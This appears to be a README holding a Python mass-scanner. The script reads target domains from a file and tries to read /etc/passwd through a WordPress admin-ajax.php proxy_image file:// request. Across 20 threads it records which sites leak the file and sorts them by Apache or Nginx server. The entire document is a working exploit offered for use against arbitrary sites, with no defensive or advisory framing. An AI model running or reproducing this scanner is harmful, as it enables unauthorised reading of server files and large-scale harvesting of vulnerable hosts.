README.md
Rendering markdown...
import requests
import concurrent.futures
import urllib3
from urllib.parse import urlparse
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Load target list from file
with open("list.txt") as f:
domains = [line.strip() for line in f if line.strip()]
# Containers for results
result_passwd = []
result_apache = []
result_nginx = []
headers = {
"User-Agent": "Mozilla/5.0"
}
def check_target(domain):
try:
# Add http scheme if missing
if not domain.startswith("http"):
domain = "http://" + domain
parsed = urlparse(domain)
base_url = f"{parsed.scheme}://{parsed.netloc}"
# Test for /etc/passwd file read
test_url = f"{base_url}/wp-admin/admin-ajax.php?action=proxy_image&url=file:///etc/passwd"
r = requests.get(test_url, headers=headers, timeout=10, verify=False)
if "root:x:0:0:" in r.text:
print(f"[+] /etc/passwd FOUND on {base_url}")
result_passwd.append(base_url)
# Check server header
head = requests.head(base_url, headers=headers, timeout=10, verify=False)
server = head.headers.get("Server", "").lower()
if "nginx" in server:
result_nginx.append(base_url)
print(" └── Server: Nginx")
elif "apache" in server:
result_apache.append(base_url)
print(" └── Server: Apache")
else:
print(" └── Server: Unknown")
except Exception as e:
print(f"[-] Failed to check {domain}: {str(e)}")
# Run checks concurrently
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
executor.map(check_target, domains)
# Save results
with open("result.txt", "w") as f:
for url in result_passwd:
f.write(url + "\n")
with open("passwd_server_apache.txt", "w") as f:
for url in result_apache:
f.write(url + "\n")
with open("passwd_server_nginx.txt", "w") as f:
for url in result_nginx:
f.write(url + "\n")
print("\n[✓] Scan complete. Results saved to result.txt, passwd_server_apache.txt, passwd_server_nginx.txt")